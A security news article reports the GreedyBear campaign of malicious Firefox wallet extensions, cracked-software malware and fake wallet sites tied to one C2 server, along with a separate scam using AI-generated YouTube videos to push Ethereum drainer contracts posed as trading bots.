Threat Actors Use Malicious Firefox Extensions to Steal Over $1 Million in Crypto.

Researchers have uncovered a new malware campaign named GreedyBear. This campaign used over 150 malicious Firefox extensions to impersonate popular cryptocurrency wallets and steal more than $1 million in digital assets.

Koi Security researcher Tuval Admoni confirmed the fake extensions posed as MetaMask, TronLink, Exodus, Rabby Wallet, and other well-known wallet services.

Attackers used “Extension Hollowing” to bypass Mozilla’s extension review process. Instead of submitting malicious code upfront, they first uploaded harmless-looking extensions, collected fake positive reviews to appear credible, then updated the code to include credential-stealing functions once the extensions were approved.

These fake add-ons captured wallet credentials and sent them to an attacker-controlled server. The malware also logged victims’ IP addresses, likely for tracking.

This campaign appears to expand on an earlier operation called Foxy Wallet, which involved at least 40 similar malicious Firefox extensions. The volume of new add-ons suggests the operation has significantly scaled up.

Beyond browser extensions, the attackers distributed malicious executables via Russian sites offering cracked software. These files installed info stealers and ransomware.

The same group also set up fake cryptocurrency service websites, including phony wallet repair tools, to trick users into entering wallet credentials or payment data.

Koi Security linked all three attack methods to a single threat actor. All activity connected to the same command-and-control (C2) server at IP address 185.208.156[.]66.

Evidence shows the campaign is expanding to other browsers. Investigators found a malicious Chrome extension called “Filecoin Wallet” using the same C2 server and credential theft logic.

Koi Security also found signs that attackers used AI tools to create some parts of the malware. This highlights how threat actors leverage AI to launch faster, large-scale operations.

“This group isn’t just using one tool,” Admoni said. “They’ve built a flexible malware delivery system that can shift tactics quickly. What began as a few malicious extensions is now a multi-platform campaign targeting both credentials and assets.”

New Ethereum Scam Disguises Wallet Drainers as Trading Bots

Meanwhile, SentinelOne exposed another active scam using Ethereum smart contracts disguised as trading bots to drain user wallets. Since early 2024, the campaign has stolen over $900,000.

The scammers promote these bots via YouTube videos. The videos walk users through deploying smart contracts on Remix, a Web3 development platform. Video descriptions link to external sites hosting the malicious code.

Researchers found the videos were AI-generated and posted from aged YouTube accounts. These accounts also share playlists of real cryptocurrency content to appear legitimate. Most comments on the videos are positive, likely because the scammers delete negative feedback.

One such YouTube account dates back to October 2022. Investigators believe the attackers either built their credibility over time or bought it from a marketplace that sells old accounts.

When victims deploy the malicious smart contract, they are instructed to send Ethereum to it. The contract then silently transfers funds to a wallet controlled by the attackers.

“AI-generated content, combined with aged YouTube accounts, allows almost anyone to fake legitimacy,” SentinelOne’s Alex Delamotte said. “Scammers use these tools to trick victims into handing over their crypto under the illusion of a trading opportunity.”